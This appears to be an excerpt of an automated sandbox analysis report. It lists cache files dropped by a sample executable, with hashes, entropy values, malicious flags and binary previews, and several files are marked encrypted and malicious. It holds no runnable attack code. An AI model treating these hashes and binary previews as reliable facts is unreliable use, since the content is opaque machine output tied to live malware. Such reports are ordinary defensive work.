                                                                                                                                                                                                    Preview: ..2K....[....3;..$..9j...SM....FX.|.{...q.]...;}b.ehJ.#....7.0s...|.1..(+TZHI6$...(c[..Ol.Z.s...$bIb.sw.R.?Lu/..V....)}...b.;.7I.."..=z.%.ux].5. /.o..u.......~.c...R1..{..|.M..G...nJu8.........j...^..........E-.].."p..@.c\..7...2.......{..}..6@.2..v....R..tY].........:.~Yng...\....x..'...'1..Z.....2....._.L...J3....51..?.V...u...f.rmsP.U..;Rq....r>.8Q}.9V#.b....2JBhIb.N:.Q..../..k...t.0....w.].UJ..p..P.RZUx.$.fn'MD.>rSrF./........1.o...6.~....}C..!.;..5.O,.Fu_.6...).R...T.{(..x...r.....;~.2,:h.7.B.b.N..G..-}.,..)....Z..|.xi%;.v....I.......RpD.. .G.;.:.6.O1x....z.....fo.U.}../<.h.2...Gq.'.X..Wc.....ifz.=T.....n..k.DS.=..P... ....Dw>..E. c.......m..p......].Pv <..L3kB(H....[...2.....%...P).q...."...l).D...%.V.e....7l...!..B...)..vN..$.+<.2.uQ.|w.UM..B*...Po;b!....gJ.m...?....~.....H....W....~1>;X...N..|.O..........h..`..S6...u....6=).C..{lVI.+k.u..R.)...6d..wu.. .4...5.R,{.zs..d^..U.nzU"km65.....9dQ...a5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\H_VmuFPRwWZ4UrVl0mPztnf3z5U[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14226
                                                                                                                                                                                                    Entropy (8bit):7.9887872506392545
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RxMgNxvTvR12PNcZ4yRObmc7ccQcHzA+xVdYioO:LNxvTW2Z5M7xHs+LJ
                                                                                                                                                                                                    MD5:4CCA37F2608DDE1E4D2325EAC47728DA
                                                                                                                                                                                                    SHA1:C2ADCA162E48422C8F17B517E37B388EEA1C845B
                                                                                                                                                                                                    SHA-256:6177812301700A6DAA697A812E68755796775DAA1BAA814AA87533E7C504C2AE
                                                                                                                                                                                                    SHA-512:CF543A6D40FC0EF3EC139C4D9CC9FE218692F8E931BEEB89D3784541415AB1F875687770FD3AE4954767EB0430676D89FFE2B13FCEF7111A829C4EFB97764B14
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: J...cy..j6WO;...8...F...|.[|M...!.q.hu.......e.bJ.1..'....#....C`2.z.d...)H....DD....U...........j(..d...|`......b.......0"..5..Vb..!.....fu..6,.~..$........d(.....'R:...$.?}P.....o....j%..Z..#....M8].z$4xjW..L..~..g..`....Y..o...... T...%v^d..h?`...;....X..l......6...PC.g.....;6...-.....c.fY.@D.^.TA...b..+H.N.l..;..N.y!....N..t....(.....C.......Gp.F....@.(X*S.Y..5..........J....x:..&.oh2..3..R.....'-....r.m....7...!..]...k.9tN?p.V.k.*...~\.,..._..~..7.V...;.........}.z.Z......C.*c.,.g...%.2'.....\])..;...d95.Yp~P/p...n........R...Q......fd.Pa...s..q8.u.j}..,..YK..4`bq..[.^-I.8..|.7m.....Qm....K..$.k7.... ..1....^V.N..c....S..gi....%..P......-....>..W.{.,...N*|.3..+X..F..on.*=....\...m.....}"s.o...Iw.RD\X....9e-.YJ.zo..P.X...-V.G..r.r........Z<.T..-\2X.l....l.*...h.k..Y..l..J....Pr...B.......3...~|....W..eN.a.x.?!.9.N.....;A...{.m.H...~4P....5..Q=="A"..y....J.2...j...B..2A..N.....\uI.D..x..$.\.K....... .:....V.....u......_.h.8...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\MWF_SocialFacebook.png[1].svg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):798
                                                                                                                                                                                                    Entropy (8bit):7.737084803721959
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4pJ7AcDq0LXjxSJt97udxNpjWztzOZWCBMW7aebD:Kpjq0LFSJt5uNFWNOZfVacD
                                                                                                                                                                                                    MD5:7627DD1116554F9F03FDAA5F3A6A66FF
                                                                                                                                                                                                    SHA1:B06DCF861679D9BC2EB703F4FB4EB945DE6B2B8A
                                                                                                                                                                                                    SHA-256:9CF588D66BB54D6354684EC35F6A8DA2D74C10A7530193ABA9E52BE96E551FC0
                                                                                                                                                                                                    SHA-512:E5C80349CA566306D9F9D57942F24B28F36FF910F70C35E63841E30B8E258B5C2EECF3F77C44F8027A2A6CB39147F985DE1E0313B4A01FE0AB5DD2B0FB42B879
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .0.............)..dV_....(..a...[].iv..,.. ..b7.Q.f7..0.v@p.hc|(..Q.P..m.=...T...ht:0i.S.8.LyOni..L`........y7...wY.~.N'.g...F#:.......Fi..3.^..}....&W.=...c..|brdX1.....|....hC0z.).....L.k.f.7..@=.o...%..>.$.R.8X..a..6.#....<I...G]-QU....D@.w......Qfc..c..;.-d.hdT~.v1U dzS.(j.....V...a....u...r..iV.^y.8...s9d......Y........zXBH...\u....@..w..C...2Y..v"../..F{...m.....i..~6.e..c..n.+."\.(N.Tc.......&R.T0.].Z..0.[e....+o.....T{.C..S....p..L.Me.^.@..Z.9W.[....P...U..y..E.~!.....>..*.....)..N!.O...X..j....G..P..o..YB.....@..HB..B..)....qf..bb.9olZ...;q^...6....)..3.I.....W.+....1D.[.yxeZ7.fv:..KS. .V......Eg.I..S<.$+Ho....%J..q....5.DG....4_..b.:.=.JVi..$rY..9YD........dqvs6...~A....)_l[..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RC5bdddb231cf54f958a5b6e76e9d8eeea-source.min[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21141
                                                                                                                                                                                                    Entropy (8bit):7.9918066223593245
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:tQwoLB7EW6hxrKwmNea5lJeZGz0aR+iNZZ+WfoDuU3bTSR0tnXHL1eOnB50nSSs6:tQwo17j+NieyJe4QarN+bb0gXRnBe3
                                                                                                                                                                                                    MD5:E7A174CC3ED777AC34326808336AFAA3
                                                                                                                                                                                                    SHA1:9EC90AE9A8ED47B3A2254A850229BA163B08A5F8
                                                                                                                                                                                                    SHA-256:C08F0898ECE8124BC7DD65B5A9B060077EA05F7D9966B08DC963E86CDEA5A89A
                                                                                                                                                                                                    SHA-512:FD607B884D6600E8C6CB9DFB1A4F2FD91372125A0200575D6D190E9AEE787B2CE2F79E9F2075AAD9E3A709B9F15AE3A877B304F0C772F4AD0A37F6EE70A8E2D1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: z.4..U...4..Y......=y'..s27.X'..z.K.P.%.l.&.......B"R..;6......j.&.A....a.XS..C...q2..'....+....t~..Ff....1@w|..a.....7.v...\..mo.O.y....k..Kj.5..^...Q,.cJJ.\.H..;....*...jq..........!.F-.^j.0..}..........Q...+..)...9{l......j.Z....+.Ir.....3.......ZNg....HC..../.Sj....A}iB...........ZYU.I.....0ft.r.....08.p"u@#/w......h#....?Y5..W7..C.(.fT..R.A+.T.....bB..?..O=:..............r.W..kN.<.Q..*.G...H.T...1SM...T.!.s9..hu..;.g..C.....+..L....c.kn......N..pD.V.....Aev.......p.....>.....dk..94.KB..5\....@Wcw.....d#..W...8...|..c.)...7u.i..g.......m. 4k.w...]..3.<[...O..G.M.:....f....N.....h.S}.&K.!.A.$..V][..|.).....|.cE..Dd&....T..5x.@..M....#........$.........\w..n..uQ.n{C...>"........q...1.)*.d&..0.A..{..>1..E...53qP.L....5.n.."U.y$....0...N...e..1mB.j........_n.t.9.....?.....I...`4.....^V..jc.<L...;.?k..Z.u.Y....Qk.....S@.6w6!?....J..........OE........CO....*.....t.>w......r%......;.X..&..M.IY.B.-.+)/p.....diSx.$.*..n...}nP.Q..4.<kC../.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RC9b2d2bc73c8a4a1d8dd5c3d69b6634a0-source.min[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1614
                                                                                                                                                                                                    Entropy (8bit):7.8606695058926785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:n4uDnYQ7gPf6EAlQVzBfjutTvLfOFxIifYUD:XkQ+Lbu5mQA
                                                                                                                                                                                                    MD5:EE3CAEC29E86C8C1633290BF05B4CE93
                                                                                                                                                                                                    SHA1:0409A9E621EB536CD565AA426E26928BE99CDFF2
                                                                                                                                                                                                    SHA-256:0868541B9532B25FB023E105A18FA2429DDF7399CD73B2A38AFE4ACCBDA833EE
                                                                                                                                                                                                    SHA-512:555848D964C384BB4AB58D3B332D1D36A42A07CFFC94DFE758952FE9B0CDB10563BA9108E85EF15A9319EC2BB877F3C89FF374E76D09DD9F445E7A830A3933E0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .e..D....F.f.1..%k..*$Z.>...?q.;.O".?N..^.0..Yu7..R...."...Eu%..o./..BU.=.../..X.L....J....PS.C..5.=.q1n...V'..S...O.2r....!..d.snC.7e.g<.~..VG..%.{....~..d`..q......V.$...iX)._....f@..\.......=Uj...-.........G...v.....!.J...>..W6 ^.5\.........O...~..+...p..N.....XF.3...q.!.\..9...2|".U..n..|......#.O...r._..{.n...(..Z.0../E.)..K.Hr..+~.!..H`..........gB......+k'W.0.R.{......pK .|s..........;....... nW.o$sb...D.#'A5.I....4.B......[{q.}.0|d.2{T.!`....}9#...u..A$...7.g..k..a.........`J..Kx.|i..}K...<.....E.....5."15.Wv.6.,...>Wa..D..h..X..%.t....g...b........>5D?..22 ?..?.6Q5@W...*Je.G"r.N.....r..WJ...f...@.9.{.8......B.l.4........k."..~@.......h...?......E...o2{..o..w.....SP.OD..uQ.YE...X.=h....p..;./1.[t......B...K.[+U.......P..K).]X..ZA.k.DE..+o.....D-.iT[*...)...m....W..L.....v;..\r..7s.`z.x....(..0...W. ).o.#..R.j2.9..g...<....K.....v.%...nE..R..2H.....o....n..O?.....Sx.4}...Eu....m...xnJ.......-.7".}&..EM.m...R..^...|.h5.t..t.E....%...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4FBmQ[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):125079
                                                                                                                                                                                                    Entropy (8bit):7.998286868221628
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:KPG3BEpsTwnJyghbHFFVp8oHmlXw7hCXH1fsd+3ic:KuusWycJFH8oHmg7khO+3ic
                                                                                                                                                                                                    MD5:76E457C7819A6B7320364A8F202FA7D0
                                                                                                                                                                                                    SHA1:78FE0C162B9C710938C94AD2E4DB580DE168D441
                                                                                                                                                                                                    SHA-256:84775277295064F99FFD47126F2A592ECF1A4AE3331B738245214BE6BB8045C4
                                                                                                                                                                                                    SHA-512:4DE7634CD7393EFDFF433170701875017BA2C934E44FBE5C522237BBD6A80D281692211EA3A9F9BDDBEB477E9A41CFEB12757B3A229C4518C1941D2E64CD0E7D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...TO......5.o.Z..g.....)......c.o.Nz4....x..+..H\>..P..5.`.2....bMm....{'.P...t..h.\...x.T.4......_...6..%2L..m.....&.....T.3..^.....o..P.y.<.M..A=...P\.....}>..z..........u..[w.B).MKV...1U..r..P.1..\..Q. .1..W...o.R=......md..o...../@7.m.~..CE{.(P..6.d.z.D.F......j_$...stl..&J)..G.....l.*.K.h.?.4.P~g.U..Qb)...a.zN>&...ZQ<x..n..rF8............eF..^..h]...j..7...u.xD...[R.\...-.$A.c.u9.^.H...4....=Z.E....rV.h..^.4T...R>....s....x.6W.......T5..kQ....,..~.&.../7+.y...............5....4....pD...b..A8.Z...)...V"..y.U.]...=t~.v.A<.p'B.Hv....x....NG..?....".b...k.b.:...m...*...m.g.X.....x.v.p.B....Z.l.y...-...O...K^%.O.6.m.:........;....M......u...k....._G.v7i>..r}'J..1.m].U6.z.h.......J..n.....n ..b.X.JJ./5V3..G-C(.R....Zy..q..I....aU....S ~.=..].?..9....~...._..K..._$.q...NSK..g.......QB.D.Nd&.q~8.:...q;QBl....fE...v...).j......-|....X+...(...BIX.[.+...{...!...l(w....J.@..i.....s...B5....`..y.V.9...1...d..D..hl...+.5..F.#B.@2.p.o...r
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4ncJa[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9989786756378205
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:wmwjSxFYmeQs9Su+w7joKWMaqsSd/+oVWskS8JTqu6UX:wmw+FYmZs93HDd/+IrgJ56C
                                                                                                                                                                                                    MD5:1040F0231E4462C4783CD735EB58FAA3
                                                                                                                                                                                                    SHA1:0515338BC1220987F28093D6404E722809C987B8
                                                                                                                                                                                                    SHA-256:A62B002E19FE1DFECB1B350F11DFB2B6AB9D78980F6A51E6C6D3F2B0961D0E8E
                                                                                                                                                                                                    SHA-512:90A7A2BCE5F3A57CF528A7E0FDED6C820B946E1951C2408B63B3159EC272101CA4B57C351276043A88F04C92DA5BF2DC3C05E048EA5766EA62C847C08060009D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Ak.8.....6..gB9K...+..P(:..L..TSJ.b.q.tP..@....\.k7...........uZ.ea.C..r"......sR.].T=6..h...>..r.%.g...4o.;l.e}....tDPZ...T*U.S".tW.?TR.E...K>f...e..jpZ...y..C@T.c........0.Z..#%Dik)...F-X......A..X...."..C....g....1...O.ew.X.#.".qGI..YL.o..;.>....v..aa..[..&~....9P.S..z..~^......b....l.(.f.,..I.W.>.z........4.........>.~B......e...9...0..(..3C.N,._...r.(..;P...*/"?uH.......LF..`.....G?..2&l.J.g@pM.i../~.....f......r+.8.A...^A...b...vR.G..H8..5.c*.....7.DC5....RSc#Z..9...n'.?..Dy3r..b./J.A......c%3...D...u....<.._hxU.a..."..l...Ne.K*r.....4.e...~.. #=.y.[.....G.X...I.$.H.H...z....5.{...:..........N...U.....t.2.|/.HmC=9.1.......A.....Q...e..1,Y..S)..............l..;7.....b:a@.x..L....(.....n-..o....w..@.5.._...a#.+.......=.pY..+0A...h)7c.....k7..g..o.P.Q{f2.,P.t.q.B}N..7m:...Y..z.).e&...g.(.|f.......U.I...:.\.....M...{.D..;.~.\p.l.Y..b...P.EA|.|..ry..c!.(......X.h,Oh.=..B)"....O..;..11A..#^....j9...`[ .!x.{n.6.By.# ..........&.....8.$......T....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4sQww[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9986973291185475
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:NOgT92CPwUi+s0SYONdoCosZ6GJFGUSJKhvlErRakh/mOFdj8q7u1clbM:IgT9izupG3GUSo7EzZOQumlw
                                                                                                                                                                                                    MD5:5368E6D669D1ABA630ED7A427BA20155
                                                                                                                                                                                                    SHA1:BABCDBD10324A2DD67649945D4E95473336C4FEB
                                                                                                                                                                                                    SHA-256:9DA3C66AA904C1ABCB6A4E23B314A5FC81DB961FEC944B84FE6F38C33A2EA1DD
                                                                                                                                                                                                    SHA-512:CC33E2539D0FDAD29F0B7B3F22E297B940C9CDA201AC43DD4437CBC8132502F9AD7832C35B8DCD583048B4CE3614570F52F12E5C8F9965B7751C0B5BDE9E29D8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Yi..G..iw<p.w*.....K......b....;..i...L|...b.z...T...<o..H.h.....k.4..V..;.-C.>.-.."P.`. ._......W[....W....(...q. ...HW.U...Q..@.H.{.d......6__.........gx_.F...M...UJ.....=.....0.D.i......".J...x[.$...O......!.Y...:c.^6'.#.n...;...Jl.........a...C..}I.k.0.D..M!L..10.tl[..6e..I...k.6..v+.e..[.p...m...{..V....|..bI.m-W<.....!....u.9@.B.l....j.}.+...Ou.bA...M.,.:_.D...6..%=z..Rwz#M..sZ..+3~sk,..hX......m%...Vh.P.{..EdJ*TGI...Z&..B.U.~2.cG...W..Ph .......f...r.$2...q...w.=....#Mh..T.m..`.oI..IS!..sp...h...s..T...B.).*....'..$...m.6:.d...............t.Y.nTn..WRUn......1...z..v m..-N.p....XO.qm..$..iN....y1/).....u.R..!.x.....>......%NF1.H.M.r}h..x....r+Fe...x.` .......e..".....P...~.t..b."r....7}..hD.?K.-....-.^P..N..w.._f...Z.....F....H.*.6bg>Z..b..rT.ATG..Z..=..wM.N......S9D....q...|...q.I.S...|T e..Ok^.ud8H_........T.5....P.l...U.F....1.X5......X.$..}.|.|..).1..b.5.".K.5..o...".0....e.-v.[#_.m..#.&..3..n3....`.P(.4..mb....l$.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4tKUA[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):106410
                                                                                                                                                                                                    Entropy (8bit):7.998222680232137
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:tGJ9uimF2RWMqc3qYzE4eMpWp410nSsmWapWgK0aML:ts9uimFIWMqcJ1Tps4ubZfML
                                                                                                                                                                                                    MD5:07A1CB7230CE31C2804B7FBEDE134335
                                                                                                                                                                                                    SHA1:C3329A19BF735BC070EE8FF23AF756F43E1ECBA9
                                                                                                                                                                                                    SHA-256:7D6003AF0E107525ABA51EDC944C99E38735C581E22813A9B4A7BE3CB2BF112D
                                                                                                                                                                                                    SHA-512:9C49DA962993A36912467E949398996F4CB057F251AC8865F5D7A5489C0DED52E939C64F6CA9C778317669CE81C4425EAE5062943A877D6FD1CD2B2F3A424045
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \:A.....9+.Tc0R.0.^F...=....I.......k.*..[....?/................O.j.....G.%>g.7.AF(...U..<:...@&6.%...Z..O.....I.Z.u.q......'....GN=r.s8.3)s...(..Lo...=.8@.G.L.JwYYY...s...."4.\.........D..._.6.@.p.E...VK....)..Io.#.f6VOjK....+cA.o.L..D.H6.....W..Y..OV.QtQ..\.I..R.Dm..q..^B..J....U5a...@...z..d....t~/6...a....@sL..........d..BMmS.;.2.d...5....:.P.9.v....%.Gjo1.'..:....[.\..>1%.L.7.@2............M..-35IR.Y.9N.VWJ..W..3.....L{]..W@^t.c.6.kH.a.Q.7.c..`.....mH.e..E...u.....y8#.=^ZV."g.jBT.d...!..\.......N.e.#...S....6,:.or..t1.MYZm....,.........&.Q...t?...;l.....n+1.....H.V.....}....z.r.I.......v.c.z.Y..8{.W......v.(Q...B..L..x..q........".V..9,......n..9..t$.....:..........|.>......g...(..X....}...R....L..A._+..3J..nL.tCs..!..=.....H,.=.Ur.j..>..X....9zV..34..Moz.....(.4il.-...S*...n6./~.P.m(...&r.,......9....&....wq~.hz..&/.7....Q(...I...Z.J....5..L.......Tq....!B$+.....'0.=H8..~..v.......+......Hr.._9Y9.-.....9..\(D.....1.L.)V....c.c..W8v..5..K....7qq3
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4zuiC[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):62947
                                                                                                                                                                                                    Entropy (8bit):7.996849312434858
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:TOPBis5ApP0/WhuwrUxmys7gJ9I4EJcaQRlB5R28:T4IP0wuwYxmyZ9BEklB5/
                                                                                                                                                                                                    MD5:F8ADBA7CEFD099972F06B25DF6E45488
                                                                                                                                                                                                    SHA1:A4B6324BC7AEBB4AB9D01CB01A717C19D73EF386
                                                                                                                                                                                                    SHA-256:4FF5A51D1DAFF4C40700DE9F4C96003C534FEADFB2ED4F3B6BF787147F2FFA08
                                                                                                                                                                                                    SHA-512:5E3D42085BC518DF74725828FF4C4C0B30ED8B6D28B55397332BCAA6FAF745A07FA6685839CD111995C2873E262AC83F6B5EB2451C404C5ACCD4F344BACCA437
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...9.../'.8....\.r.,.).0../K.N....@..sp....3*..2-K..pi...Bw+-....Z?....a.s.tZ..........{."c...E..........#a.e.iy....7.q...u.!...H.(X..p........../A..\..6..i;..b.......3.C...t.` k......V.R^X.-....y.,..`..1.7..'.....[.d..,.o...l....IC....JA...@-B:.....d.....&.[. .u!.`.u9NEf{xE.Nhg..{.<..N.a...i.!.....W.......q......)....fUKfh.y.0.o...D..:.0..mz..&Z]fF..JW......g...B...).d.K..{g..P....E...1&............<..^..3k9..kBy ........P..4.na.z..H.G|.[M....9b..,.H..?.A...mQ{.....=.x......L../1.X:...........\.F.....\..RS_1\...2..'..p......,3..[..hU..O:....(.OR.m.f...,..h.(.n.....,..U..@.8.....O..../..._...$.6.nZ..6....7..&.H..J~.a3.}.:;.r..$....l#.I*H>......X...KIR......4.DsY&f7..D../x..y...&.0..M.%p......P.y......!.{LNO.P.z!..2o.....$..3...9...v.Ax.mi(........r..T.<7G....2..C...>.>..!*.]....IX.LW.T"7:!...`.!.A0..z8..3?..'.$C..C}.$.(....@..M.:.........}.k.....j.B.....h....f../.p..+p.v!...]..u4d...D.w......B..ON].K..D.7z.....H.pB"..0.H".r..z....J.O..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\UMc3LQfNxSkvn2QdRt2WMsv397Y.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                                                    Entropy (8bit):7.546815207875573
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:IjEGn9WCOOzydcCbA/YKZ+cKhPTpvvceF5kx5zq7cii9a:IjBndOACkQCEvcwg5e7bD
                                                                                                                                                                                                    MD5:1E844ACB10DEFBBDE30A21037AD5A767
                                                                                                                                                                                                    SHA1:32FFA0FF820BB2669E3B3F9CA402579975BC7D97
                                                                                                                                                                                                    SHA-256:917914374B479F3027C845559DE82F26D9356EA5573668648C9E3A0F882CF90B
                                                                                                                                                                                                    SHA-512:73330148C4184621E48C99A19D16D686555E3178ECA21DC49F5ADF18882DAED413776A0E2BAEE67DA1116D6FD0DBB1A99DCE3A6CEAB1082C047399AB84AA6F52
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Z...?<.l....F+.e^..t..9....l.?..+.IS..6..&V.(.#.;...j.b...v#C......v..[...(2...+..._Tn...=.W.vg{G$k..\$MJC.z{.xWf<..D9..^.{..7..w.'#...b...+UU...C(...y......"|..*q.n5..g..P...g.b@.PIw.!.0..g....@........%...A ......}....^*z.y.A..jz.h}.....7=z.....D,......]..YF....f..].......n.....i........r..9.../.,..0V.].@...w.K.~..vOr.,..J@..hV....u..$..X.(.3.L-...k...[..i.........y...x...r.ZDk...........fo.3O.=....\......l..b.z........E.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\Windows_Cortana_AppStore_img[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15313
                                                                                                                                                                                                    Entropy (8bit):7.9893151945858465
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:skGCah1MrScGw8MiN7gajiclguKe6yxbQC4ZIkumQc21zfqyD:NGt1gScGw8MiN7RjBWuMezFcujqE
                                                                                                                                                                                                    MD5:66AC785E7AD309A2A04C08EA75292EFA
                                                                                                                                                                                                    SHA1:56A078E38FCF091EBE0010A760A0990049C9D6FD
                                                                                                                                                                                                    SHA-256:B3A2C55A347FF3D6B1CF456498A4B6471CED7BAFCF306AD322FC2E3EA2A8A47B
                                                                                                                                                                                                    SHA-512:09597B170EED5D03AB3B757FFE28FD444A8938E2F46D4B62392630AAAB2D65E9DC2D07737F4437B084AC1376601D5051AF40BE9F5414B3FC68B046EAB21A2E0F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....G+..`.E.x?.?..Qf7.LT#.....i7I.Okq.tB.7XT...S..T...Er..))....4fDm.....~..4K...+...0. Q5.Tv....sF5..$e2.ul!.n.KFxX..x<v4.....^..P...{...Tw.1....E-.....D.Z..oV...q........w&..b..3.a;...M..J.....d...`. .H.]q-=7G..t....}..P...B.k.tQ.....%.0....{..p.d+.0w.Ll.r;..Mh.yM......2S.R.T.E.{]7..fR4R.....O..j......7.+.Tr.C:...4.y.7. ..6..P.@.;.t......N..57.../.[-..G.... ...4;FF.(5@....&..z.W.;....u...wT-.!.......,w.Vc.C..].dX+.B.z....R}.....).UF..........^/k......I..).V\.[..A+..[J~-..2.2$...r....xa......-.W..o....=."p.8-P...)..c#9./.E.b.$.Ml....pJ-n..7.x......%^.....2...s..1O.....ox.{...w.%`x.:.o;p..z.}m.......D..k/.. .:?.....v..9...~...z.i...a..7..(+~.~N.~D\.|...3...u..8...F.......L.Z.......E...G.C............x.d..D.70....#]..D.F.[....H._C..B.c..4....a.^....r\{.b.....?...S..W<..5..e..1.D.6>.[O.AR....<T..5Z"I.D.......^.fe..T$...,k.[..Zq.__.R....iD.J._..7%....SR4..Z0u...Wu{..x.....0..T.....p..IP..<4..-...^\........G....%.w........2......=...3.u(5....De.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\Yn0gcgK5qpBL1FwUysgJ2ZUgbjg.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                    Entropy (8bit):7.901423316472316
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:3myyb/+ZcZrTLRqj6RgEybIGWlU3BQHu51KK9geu2G+z/D:eb/+iZfFYAb+7ziO/+eNGk
                                                                                                                                                                                                    MD5:61F4E9701FACECD836B5F99C56E6CAC7
                                                                                                                                                                                                    SHA1:6735637910041946D6A6D41501D8DCF1177F0B18
                                                                                                                                                                                                    SHA-256:B570EEF372BD2A52EE582AFADD59E6903E24771CD3BF2DF8A2A04C8D33A4B082
                                                                                                                                                                                                    SHA-512:E51CE59F1A93D1D97FF58B3CDC163A362719B67754088F4C731EA368995F16EB98966E2E110D76ABF00B3D0F06D0C323CCA1A953FDE562D8D797FFD4B44FB895
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
